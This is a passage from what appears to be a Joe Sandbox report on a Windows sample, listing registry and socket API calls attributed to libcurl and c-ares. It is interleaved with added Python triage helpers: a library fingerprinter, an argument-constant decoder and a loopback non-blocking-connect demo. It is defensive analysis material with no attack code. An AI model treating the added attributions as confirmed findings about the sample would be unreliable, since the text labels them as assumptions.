                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: recvfrom
                                • String ID:
                                • API String ID: 846543921-0
                                • Opcode ID: dd41d3f27a39093d5b3e2a1331f6e4dceff417f883427d92ab55467b578a78e5
                                • Instruction ID: 370aa72731ea114ea777bd851aa1866bf374fd4919fb57944abe46199e4b1f9c
                                • Opcode Fuzzy Hash: dd41d3f27a39093d5b3e2a1331f6e4dceff417f883427d92ab55467b578a78e5
                                • Instruction Fuzzy Hash: F7F06D75118308AFE6109E01DC48D6BBBEDFFC9758F05496DF948232118270AE10CAB2
                                APIs
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A499
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A4FB
                                • GetAdaptersAddresses.IPHLPAPI(00000000,00000000,00000000,00000000,?), ref: 0028A531
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 0028AA19
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028AA4C
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,?), ref: 0028AA97
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0028AAE9
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0028AB30
                                • RegCloseKey.KERNELBASE(?), ref: 0028AB6A
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\Windows NT\DNSClient,00000000,00020019,?), ref: 0028AB82
                                • RegOpenKeyExA.KERNELBASE(80000002,Software\Policies\Microsoft\System\DNSClient,00000000,00020019,?), ref: 0028AC46
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces,00000000,00020019,?), ref: 0028AD0A
                                • RegEnumKeyExA.KERNELBASE ref: 0028AD8D
                                • RegCloseKey.KERNELBASE(?), ref: 0028ADD9
                                • RegEnumKeyExA.KERNELBASE ref: 0028AE08
                                • RegOpenKeyExA.KERNELBASE(?,?,00000000,00000001,?), ref: 0028AE2A
                                • RegQueryValueExA.KERNELBASE(?,SearchList,00000000,00000000,00000000,00000000), ref: 0028AE54
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,00000000), ref: 0028AF63
                                • RegQueryValueExA.KERNELBASE(?,Domain,00000000,00000000,00000000,?), ref: 0028AFB2
                                • RegQueryValueExA.KERNELBASE(?,DhcpDomain,00000000,00000000,00000000,00000000), ref: 0028B072
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: QueryValue$Open$AdaptersAddresses$CloseEnum
                                • String ID: DhcpDomain$Domain$PrimaryDNSSuffix$SearchList$Software\Policies\Microsoft\System\DNSClient$Software\Policies\Microsoft\Windows NT\DNSClient$System\CurrentControlSet\Services\Tcpip\Parameters$System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces
                                • API String ID: 4281207131-1047472027
                                • Opcode ID: 41e255e41d08f9c894228c137e09ed546e9faa8d4d6358d5fb52964c03f437db
                                • Instruction ID: 8c8c7b2b071efc72a9b2c4c82e6e6b88f307d8fe6f37901028d7955fd267fc52
                                • Opcode Fuzzy Hash: 41e255e41d08f9c894228c137e09ed546e9faa8d4d6358d5fb52964c03f437db
                                • Instruction Fuzzy Hash: 0C72E0B5625302ABF710AF24CC85B6B7BE8AF84700F144829F985D72D1EB75E854CB93
                                APIs
                                • setsockopt.WS2_32(?,00000006,00000001,00000001,00000004), ref: 0020A831
                                Strings
                                • cf_socket_open() -> %d, fd=%d, xrefs: 0020A796
                                • Local Interface %s is ip %s using address family %i, xrefs: 0020AE60
                                • Bind to local port %d failed, trying next, xrefs: 0020AFE5
                                • bind failed with errno %d: %s, xrefs: 0020B080
                                • Trying %s:%d..., xrefs: 0020A7C2, 0020A7DE
                                • Could not set TCP_NODELAY: %s, xrefs: 0020A871
                                • @, xrefs: 0020A8F4
                                • Name '%s' family %i resolved to '%s' family %i, xrefs: 0020ADAC
                                • cf-socket.c, xrefs: 0020A5CD, 0020A735
                                • sa_addr inet_ntop() failed with errno %d: %s, xrefs: 0020A6CE
                                • Couldn't bind to interface '%s' with errno %d: %s, xrefs: 0020AD0A
                                • Trying [%s]:%d..., xrefs: 0020A689
                                • Couldn't bind to '%s' with errno %d: %s, xrefs: 0020AE1F
                                • @, xrefs: 0020AC42
                                • Local port: %hu, xrefs: 0020AF28
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: setsockopt
                                • String ID: Trying %s:%d...$ Trying [%s]:%d...$ @$ @$Bind to local port %d failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s' with errno %d: %s$Couldn't bind to interface '%s' with errno %d: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$bind failed with errno %d: %s$cf-socket.c$cf_socket_open() -> %d, fd=%d$sa_addr inet_ntop() failed with errno %d: %s
                                • API String ID: 3981526788-2373386790
                                • Opcode ID: 2fd195266a5a3dd9a76dcf85da76e9a61ab2296e0df987a99f3dc9fc249a70dd
                                • Instruction ID: f3cd0d97d880503622d8a3e6e4b9a4aa7625cd1e988549f68e9e7fed84199dc3
                                • Opcode Fuzzy Hash: 2fd195266a5a3dd9a76dcf85da76e9a61ab2296e0df987a99f3dc9fc249a70dd
                                • Instruction Fuzzy Hash: 50620571514382ABE720CF24C846BABB3F4BF94304F444929F988972D2E771E865CB93
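                                Added triage example (not code from the Joe Sandbox report or from the sample). The String ID fields of the functions above carry source-file names (multi.c, ares__sortaddrinfo.c, cf-socket.c) and connection-log format strings, which in practice mark statically linked library code rather than the sample's own logic; treating multi.c / cf-socket.c as libcurl and ares__sortaddrinfo.c as c-ares is this example's assumption, not a statement the report makes. The script scores each listed function's strings and APIs against those markers and refuses to attribute on Win32 API evidence alone, so the GetAdaptersAddresses / registry function and the DatabasePath function stay unattributed for the analyst to look at. Where the report gives no function start (only an xref), the first xref address is used as the label, an assumption noted in the code.

```python
"""Library-fingerprint triage over a sandbox function listing.

Added example, not code from the report or the sample. Scores each function's
referenced strings and imported APIs against per-library markers so statically
linked open-source code can be set aside during triage. Attributing the markers
to libcurl and c-ares is an assumption of this example.
"""
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Marker weights: a source-file name (left by assert/debug macros) is strong
# evidence, a library-specific format string is medium, a Win32 API is weak
# because any program can import it.
SOURCE_FILE_WEIGHT = 3
FORMAT_STRING_WEIGHT = 2
API_WEIGHT = 1
MIN_SCORE = 3          # total evidence needed to attribute a function
MIN_NON_API_SCORE = 2  # APIs alone never attribute a function (too generic)

# Markers copied from the report's String ID / APIs fields; grouping them under
# these library names is an assumption of this example.
LIBRARY_MARKERS: Dict[str, Dict[str, set]] = {
    "libcurl": {
        "source_files": {"multi.c", "cf-socket.c"},
        "format_strings": {
            "Trying %s:%d...",
            "Trying [%s]:%d...",
            "Could not set TCP_NODELAY: %s",
            "cf_socket_open() -> %d, fd=%d",
            "Bind to local port %d failed, trying next",
        },
        "apis": {"WSAEventSelect", "WSAEnumNetworkEvents", "setsockopt"},
    },
    "c-ares": {
        "source_files": {"ares__sortaddrinfo.c"},
        "format_strings": set(),
        "apis": {"getsockname", "recvfrom", "GetAdaptersAddresses"},
    },
}


@dataclass(frozen=True)
class Function:
    address: int            # start address, or first xref when the start is unknown
    apis: frozenset
    strings: frozenset


@dataclass(frozen=True)
class Attribution:
    library: Optional[str]    # None when evidence is too weak or too generic
    score: int
    markers: Tuple[str, ...]  # matched markers, for the analyst to verify


def _score(fn: Function, markers: Dict[str, set]) -> Tuple[int, int, List[str]]:
    """Return (total score, score from non-API markers, matched markers)."""
    score, hits = 0, []
    for s in sorted(fn.strings):
        if s in markers["source_files"]:
            score += SOURCE_FILE_WEIGHT
            hits.append(s)
        elif s in markers["format_strings"]:
            score += FORMAT_STRING_WEIGHT
            hits.append(s)
    non_api = score
    for api in sorted(fn.apis):
        if api in markers["apis"]:
            score += API_WEIGHT
            hits.append(api)
    return score, non_api, hits


def attribute(fn: Function) -> Attribution:
    """Pick the best-scoring library; refuse to attribute on API evidence alone."""
    best = Attribution(None, 0, ())
    for lib, markers in LIBRARY_MARKERS.items():
        score, non_api, hits = _score(fn, markers)
        if score > best.score:
            confident = score >= MIN_SCORE and non_api >= MIN_NON_API_SCORE
            best = Attribution(lib if confident else None, score, tuple(hits))
    return best


def summarize(functions: List[Function]) -> Dict[str, List[str]]:
    """Group function addresses by attributed library ('unattributed' otherwise)."""
    groups: Dict[str, List[str]] = {lib: [] for lib in LIBRARY_MARKERS}
    groups["unattributed"] = []
    for fn in functions:
        groups[attribute(fn).library or "unattributed"].append(f"{fn.address:08X}")
    return groups


# Constructed from this report's per-function APIs / String ID fields. Where the
# report gives only an xref, that xref labels the function (assumed, not a start).
SAMPLE_FUNCTIONS = [
    Function(0x1E05B0, frozenset({"WSAEventSelect", "WSAEnumNetworkEvents"}),
             frozenset({"multi.c"})),
    Function(0x29B180, frozenset({"getsockname"}),
             frozenset({"ares__sortaddrinfo.c", "cur != NULL"})),
    Function(0x29A90D, frozenset({"recvfrom"}), frozenset()),
    Function(0x28A499, frozenset({"GetAdaptersAddresses", "RegOpenKeyExA",
                                  "RegQueryValueExA", "RegEnumKeyExA", "RegCloseKey"}),
             frozenset({"PrimaryDNSSuffix", "SearchList", "Domain", "DhcpDomain"})),
    Function(0x20A5CD, frozenset({"setsockopt"}),
             frozenset({"cf-socket.c", "Trying %s:%d...", "Trying [%s]:%d...",
                        "Could not set TCP_NODELAY: %s",
                        "cf_socket_open() -> %d, fd=%d",
                        "Bind to local port %d failed, trying next"})),
    Function(0x299740, frozenset({"RegOpenKeyExA", "RegQueryValueExA", "RegCloseKey"}),
             frozenset({"DatabasePath"})),
]

if __name__ == "__main__":
    for fn in SAMPLE_FUNCTIONS:
        a = attribute(fn)
        print(f"{fn.address:08X}  {a.library or '-':10}  score={a.score:2}  {', '.join(a.markers)}")
    print(summarize(SAMPLE_FUNCTIONS))
```

                                The non-API threshold is the point of the design: the registry-reading function at 0028A499 matches only one weak marker (GetAdaptersAddresses) and is left unattributed, even though the DNS-suffix keys it reads are what a resolver library would consult. Extend LIBRARY_MARKERS with further source-file and format-string markers as they appear in other functions of the listing, and keep APIs as low-weight tie-breakers only.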

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                • Graph of the function starting at 00299740 (entry block 299740-29975b; calls RegOpenKeyExA, RegQueryValueExA and RegCloseKey) is not reproduced in this text export
                                APIs
                                • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Services\Tcpip\Parameters,00000000,00020019,?), ref: 00299946 (hKey 80000002 = HKEY_LOCAL_MACHINE; samDesired 00020019 = KEY_READ)
                                • RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00299974 (buffer size 00000104 = 260 = MAX_PATH)
                                • RegCloseKey.KERNELBASE(?), ref: 0029998B
                                Note: DatabasePath under Tcpip\Parameters names the directory that holds the system hosts file. Together with the CARES_HOSTS string and the "\hos" / "sts" fragments listed under String ID below, this is the hosts-file path lookup of the c-ares resolver (the CARES_HOSTS environment variable first, otherwise DatabasePath with "\hosts" appended), i.e. resolver library code statically linked into the sample.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true
                                • Associated: 00000000.00000002.1683589992.00000000001D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.0000000000768000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008AE000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008CF000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1683616047.00000000008D1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684138967.00000000008D4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.00000000008D6000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000A64000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B77000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000B7C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C5D000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C66000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684161804.0000000000C74000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684537574.0000000000C75000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684682886.0000000000E33000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1684702957.0000000000E35000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseOpenQueryValue
                                • String ID: #$#$CARES_HOSTS$DatabasePath$System\CurrentControlSet\Services\Tcpip\Parameters$\hos$sts
                                • API String ID: 3677997916-4129964100
                                • Opcode ID: ad639c0a885fb9dbf6c3489c4793bf820b8a4f242cdb0a68acaeb7daef883c0e
                                • Instruction ID: 6793b2562b0071fdf6a5b6acf663b660fb1f57551f6f68ccf7e8e363d36fab6e
                                • Opcode Fuzzy Hash: ad639c0a885fb9dbf6c3489c4793bf820b8a4f242cdb0a68acaeb7daef883c0e
                                • Instruction Fuzzy Hash: 9D32B9B5924202ABEF11AF25EC42A1B76D4AF55324F084438FC4996263FB31ED74DB93
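The argument columns in the APIs lists on this page are raw 32-bit stack values printed as hex, so reading them means looking up registry and Winsock constants by hand. The decoder below is an added example written for reading this report; it is not Joe Sandbox code and not code recovered from the sample. It parses the "• api.Module(args), ref: addr" entry format used throughout this section and names the constants that recur here (HKEY_LOCAL_MACHINE, KEY_READ, SOL_SOCKET with SO_ERROR and SO_SNDBUF, SIO_IDEAL_SEND_BACKLOG_QUERY, the WSAStartup version word). The embedded sample entries are copied from this page; the constant tables are a hypothetical hand-picked subset of the Windows SDK headers that a triage script would carry, and the function names are the example's own.

```python
"""Decode the raw argument columns of Joe Sandbox "APIs" entries.

Added example for reading this report; not Joe Sandbox code and not code
from the analysed sample. SAMPLE_ENTRIES are copied from the report page;
the constant tables are a small hand-picked subset of the Windows SDK
headers (winreg.h, winsock2.h, mstcpip.h).
"""
import re
from typing import Dict, List, Optional

HKEYS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
REG_SAM = {0x00020019: "KEY_READ", 0x00020006: "KEY_WRITE", 0x000F003F: "KEY_ALL_ACCESS"}
SOCK_LEVELS = {0xFFFF: "SOL_SOCKET", 0x0006: "IPPROTO_TCP"}
SOL_SOCKET_OPTS = {0x1001: "SO_SNDBUF", 0x1002: "SO_RCVBUF", 0x1007: "SO_ERROR"}
WSA_IOCTLS = {0x4004747B: "SIO_IDEAL_SEND_BACKLOG_QUERY", 0x8004667E: "FIONBIO"}

# "• api.Module(arg,arg,...), ref: 0012ABCD"  (the leading bullet is optional)
ENTRY_RE = re.compile(r"^•?\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
HEX8_RE = re.compile(r"^[0-9A-Fa-f]{8}$")   # Joe Sandbox prints numeric arguments as 8 hex digits

# Constructed input: entries copied from this report page.
SAMPLE_ENTRIES = [
    "• RegOpenKeyExA.KERNELBASE(80000002,System\\CurrentControlSet\\Services\\Tcpip\\Parameters,00000000,00020019,?), ref: 00299946",
    "• RegQueryValueExA.KERNELBASE(?,DatabasePath,00000000,00000000,?,00000104), ref: 00299974",
    "• getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00208D0F",
    "• WSAIoctl.WS2_32(?,4004747B,00000000,00000000,?,00000004,?,00000000,00000000), ref: 0020935D",
    "• setsockopt.WS2_32(?,0000FFFF,00001001,00000000,00000004,?,00000004,?,00000000,00000000), ref: 00209388",
    "• WSAStartup.WS2_32(00000202), ref: 001ED65B",
]


def parse_entry(line: str) -> Optional[Dict]:
    """Split one entry into api, module, raw argument strings and call-site address."""
    m = ENTRY_RE.match(line.strip())
    if not m:
        return None
    raw = m.group("args")
    args = [a.strip() for a in raw.split(",")] if raw else []
    return {"api": m.group("api"), "module": m.group("module"),
            "args": args, "ref": int(m.group("ref"), 16)}


def as_int(arg: str) -> Optional[int]:
    """Numeric value of an argument column, or None for '?' and string arguments."""
    return int(arg, 16) if HEX8_RE.match(arg) else None


def _lookup(table: Dict[int, str], value: int) -> str:
    return table.get(value, f"0x{value:08X}")


def decode_entry(entry: Dict) -> List[str]:
    """Name the constants in the argument positions that matter for each API."""
    api, args = entry["api"], entry["args"]
    ints = [as_int(a) for a in args]

    def num(i: int) -> Optional[int]:
        return ints[i] if i < len(ints) else None

    notes: List[str] = []
    if api.startswith("RegOpenKeyEx"):          # (hKey, lpSubKey, ulOptions, samDesired, phkResult)
        if num(0) is not None:
            notes.append("hKey=" + _lookup(HKEYS, num(0)))
        if len(args) > 1:
            notes.append("subKey=" + args[1])
        if num(3) is not None:
            notes.append("samDesired=" + _lookup(REG_SAM, num(3)))
    elif api.startswith("RegQueryValueEx"):     # (hKey, lpValueName, lpReserved, lpType, lpData, lpcbData)
        if len(args) > 1:
            notes.append("valueName=" + args[1])
        if num(5) is not None:
            notes.append(f"cbData={num(5)}" + (" (MAX_PATH)" if num(5) == 260 else ""))
    elif api in ("getsockopt", "setsockopt"):   # (s, level, optname, optval, optlen)
        level, opt = num(1), num(2)
        if level is not None:
            notes.append("level=" + _lookup(SOCK_LEVELS, level))
        if opt is not None and level == 0xFFFF:
            notes.append("optname=" + _lookup(SOL_SOCKET_OPTS, opt))
    elif api == "WSAIoctl":                     # (s, dwIoControlCode, ...)
        if num(1) is not None:
            notes.append("dwIoControlCode=" + _lookup(WSA_IOCTLS, num(1)))
    elif api == "WSAStartup":                   # (wVersionRequested, lpWSAData); low byte = major
        v = num(0)
        if v is not None:
            notes.append(f"wVersionRequested=Winsock {v & 0xFF}.{v >> 8}")
    elif api == "getsockname":                  # (s, name, namelen)
        if num(2) is not None:
            notes.append(f"namelen={num(2)}")
    return notes


def decode_report(lines: List[str]) -> List[tuple]:
    """Decode every parsable entry; returns (api, notes) pairs in page order."""
    out = []
    for line in lines:
        entry = parse_entry(line)
        if entry is not None:
            out.append((entry["api"], decode_entry(entry)))
    return out


if __name__ == "__main__":
    for api, notes in decode_report(SAMPLE_ENTRIES):
        print(f"{api}: {', '.join(notes) or '(no decoding rule)'}")
```

Pointer arguments that Joe Sandbox could not resolve are printed as "?" and stay undecoded; only positions that hold a documented constant are named, so an unexpected value in a named position (for example a KEY_ALL_ACCESS open where KEY_READ was expected) stands out in the output.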

                                Control-flow Graph

                                control_flow_graph: function at 1d2f17 (basic blocks 1d2f17-1d31d6). Edge list of the rendered graph omitted. The graph shows a registry walk: RegOpenKeyExA at 1d2f91, a RegEnumKeyExA loop at 1d315c, for each subkey a second RegOpenKeyExA at 1d3010 and a RegQueryValueExA at 1d3089, RegCloseKey at 1d313b per subkey and at 1d31b2 on exit. The report lists no resolved API arguments for this function.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true (associated dump files identical to the list given for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: CloseEnumOpen
                                • String ID: Xlw$Xlw$lw
                                • API String ID: 1332880857-1040989031
                                • Opcode ID: 67f73adb7b2633fedbba2ab960b69b4e169b576f5822cc4dd06ce36bb0f1fa8f
                                • Instruction ID: aa9e60fd227d21ca1611d5cdf3173c6d190efe94c575302f7f629071ffbcbc97
                                • Opcode Fuzzy Hash: 67f73adb7b2633fedbba2ab960b69b4e169b576f5822cc4dd06ce36bb0f1fa8f
                                • Instruction Fuzzy Hash: 9371B5B49043199FDB50EF69C58479EBBF0FF84308F10896DE99897305E7749A888F92

                                Control-flow Graph

                                control_flow_graph: function at 208b50 (basic blocks 208b50-208f06). Edge list of the rendered graph omitted. The blocks of interest are connect at 208c1f, then SleepEx followed by getsockopt at 208cd9-208d16, i.e. a non-blocking connect whose completion is read back through the socket error status.
                                APIs
                                • connect.WS2_32(?,?,00000001), ref: 00208C30
                                • SleepEx.KERNELBASE(00000000,00000000), ref: 00208CF3 (dwMilliseconds 0, non-alertable: a scheduler yield between connect() and the status check, not a delay)
                                • getsockopt.WS2_32(?,0000FFFF,00001007,00000000,00000004), ref: 00208D0F (level 0000FFFF = SOL_SOCKET, optname 00001007 = SO_ERROR, 4-byte int: returns the pending error of a non-blocking connect, 0 when the handshake completed)
                                Note: the strings under String ID below (cf-socket.c, "connect to %s port %u from %s port %d failed: %s", "not connected yet", "local address %s port %d...") are verbatim from libcurl's lib/cf-socket.c, so this connect routine is libcurl's socket connection filter statically linked into the sample.
                                Memory Dump Source
                                • Source File: 00000000.00000002.1683616047.00000000001D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 001D0000, based on PE: true (associated dump files identical to the list given for the first function above)
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_1d0000_joE9s9sbv0.jbxd
                                Similarity
                                • API ID: Sleepconnectgetsockopt
                                • String ID: cf-socket.c$connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                • API String ID: 1669343778-879669977
                                • Opcode ID: dc3d9c4e64f2379cdcc6b53a69b2dcb4d85e46121fe0626a7d39ba5914fded76
                                • Instruction ID: b29892ba5f9247d9ffff902dab44e93d4b4382158bce85fca2c3f0b43c6fcc7a
                                • Opcode Fuzzy Hash: dc3d9c4e64f2379cdcc6b53a69b2dcb4d85e46121fe0626a7d39ba5914fded76
                                • Instruction Fuzzy Hash: EDB1B170614706AFDB14CF24C985BA7B7E0AF55318F048629E89D8B2D3DB71EC64CB61
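The connect / SleepEx / getsockopt(SOL_SOCKET, SO_ERROR) sequence in the function above is the standard way to finish a non-blocking connect: connect() returns at once with "in progress", the caller waits until the socket becomes writable (or, on Winsock, signals an exception), then reads SO_ERROR to learn whether the TCP handshake succeeded. The following is an added example, not code from the sample or from libcurl, that reproduces the same check in Python against a loopback listener it creates itself; the helper names and the 127.0.0.1 addresses are the example's own. It shows both outcomes the sample's code has to handle: a completed connection (SO_ERROR 0) and a refused one (ECONNREFUSED).

```python
"""Non-blocking connect completion check: connect -> wait -> getsockopt(SO_ERROR).

Added example for this report; not code from the analysed sample or from libcurl.
Standard library only; demo() creates its own loopback listener.
"""
import errno
import select
import socket

# connect_ex() results that mean "handshake in progress" rather than failure.
# 10035 is WSAEWOULDBLOCK, what Winsock returns for a non-blocking connect.
_IN_PROGRESS = {0, errno.EINPROGRESS, errno.EWOULDBLOCK, errno.EAGAIN, 10035}


def nonblocking_connect(addr, timeout=3.0):
    """Start a non-blocking TCP connect to addr and return the final socket error.

    0 means the handshake completed; otherwise an errno value such as
    ECONNREFUSED or ETIMEDOUT. The socket is closed before returning.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.setblocking(False)
        rc = s.connect_ex(addr)              # POSIX: EINPROGRESS, Winsock: WSAEWOULDBLOCK
        if rc not in _IN_PROGRESS:
            return rc                        # immediate failure (e.g. unroutable address)
        # Wait for completion. Winsock reports a failed connect in the
        # exception set, POSIX in the write set, so watch both.
        _, writable, failed = select.select([], [s], [s], timeout)
        if not writable and not failed:
            return errno.ETIMEDOUT
        # The step the sample performs as getsockopt(s, 0xFFFF, 0x1007, ...):
        return s.getsockopt(socket.SOL_SOCKET, socket.SO_ERROR)
    finally:
        s.close()


def _name(err):
    """Symbolic errno name, 'OK' for a completed connect."""
    return "OK" if err == 0 else errno.errorcode.get(err, str(err))


def demo():
    """Exercise both outcomes on 127.0.0.1; returns {'open': name, 'closed': name}."""
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # kernel-assigned free port
    listener.listen(1)
    port = listener.getsockname()[1]
    connected = nonblocking_connect(("127.0.0.1", port))
    listener.close()                         # nothing listens on the port any more
    refused = nonblocking_connect(("127.0.0.1", port))
    return {"open": _name(connected), "closed": _name(refused)}


if __name__ == "__main__":
    for outcome, name in demo().items():
        print(f"{outcome} port: SO_ERROR -> {name}")
```

A zero-length SleepEx as in the sample is only a yield; production code, libcurl included, waits with a real timeout on the socket rather than spinning, which is what the select() call with a bounded timeout does here.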

                                Control-flow Graph

                                control_flow_graph: function at 209290 (basic blocks 209290-209470). Edge list of the rendered graph omitted. The blocks of interest are WSAIoctl at 209335 followed, on a conditional path, by setsockopt at 209371; the remaining blocks are error reporting.
                                APIs
